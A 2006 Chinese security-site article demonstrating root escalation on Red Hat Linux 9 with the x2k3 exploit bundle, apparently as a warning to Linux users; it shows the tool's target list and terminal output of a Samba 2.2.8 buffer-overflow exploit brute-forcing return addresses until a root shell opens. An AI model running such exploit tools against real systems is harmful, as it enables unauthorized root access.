首页 运维 网络学院 查看内容

默认Samba版本在RedHat 9上的溢出获取root演示

2006-1-21 05:43 592 0

摘要: Samba是在Redhat Linux 9上默认的版本。使用了该黑客的强大的exploit工具提升为了root。提升为root,只需要短短的3秒钟自己汗一个从服务器的tmp查找到一个x2k3的目录[b...
关键词: Using ret root Samba learnin x2k3 Linux 一个 Connection bob

Samba是在Redhat Linux 9上默认的版本。使用了该黑客的强大的exploit工具提升为了root。提升为root,只需要短短的3秒钟自己汗一个从服务器的tmp查找到一个x2k3的目录[bob@learnin9 tmp]$ cd x2k3/[bob@learnin9 x2k3]$ lsbind ftp gkr identd r00t samba[bob@learnin9 x2k3]$ bind ftp gkr identd samba均为目录,r00t为一个程序,让我们来看看r00t程序的执行情况[bob@learnin9 x2k3]$ ./r00t .--------------------------------. | x2k3 / | Written by Natok / +------------------------+----.| Targets: [1] Samba | <= 2.2.8 | [2] Bind | 8.3.2 / 8.3.3 / 9.2.1 | [3] gkrellmd | <2.1.12 | [4] wu_ftpd | <=2.6.1 | [5] identd | 1.2 +------------------------+----.| http://www.natok.de /|____________________________/ ./r00t [bob@learnin9 x2k3]$ ./r00t 127.0.0.1 1[*] Range to scan : 127.0.0.0[*] Socket Connecting to port : 139[*] Press control+c for skipping ! Port 139 IP 127.0.0.0 -> Connection refused!Port 139 IP 127.0.0.1 -> Connection ok![+] Let's sploit ;-)samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)--------------------------------------------------------------+ Verbose mode.+ Bruteforce mode. (Linux)+ Host is running samba.+ Using ret: [0xbffffed4]+ Using ret: [0xbffffda8]+ Using ret: [0xbffffc7c]+ Using ret: [0xbffffb50]+ Using ret: [0xbffffa24]+ Using ret: [0xbffff8f8]+ Using ret: [0xbffff7cc]+ Using ret: [0xbffff6a0]+ Using ret: [0xbffff574]+ Using ret: [0xbffff448]+ Using ret: [0xbffff31c]+ Using ret: [0xbffff1f0]+ Using ret: [0xbffff0c4]+ Using ret: [0xbfffef98]+ Using ret: [0xbfffee6c]+ Using ret: [0xbfffed40]+ Using ret: [0xbfffec14]+ Using ret: [0xbfffeae8]+ Using ret: [0xbfffe9bc]+ Using ret: [0xbfffe890]+ Using ret: [0xbfffe764]+ Using ret: [0xbfffe638]+ Using ret: [0xbfffe50c]+ Using ret: [0xbfffe3e0]+ Using ret: [0xbfffe2b4]+ Using ret: [0xbfffe188]+ Worked!--------------------------------------------------------------*** JE MOET JE MUIL HOUWELinux learnin9 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linuxuid=0(root) gid=0(root) groups=99(nobody)iduid=0(root) gid=0(root) groups=99(nobody)看到了吧。就这么轻易的被夺取为root了。 提醒喜欢用Linux的朋友多关注黑基础.我们将最新最快公布Linux的漏洞和使用安全技巧奉献给大家. For@飞 QQ:330333760
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部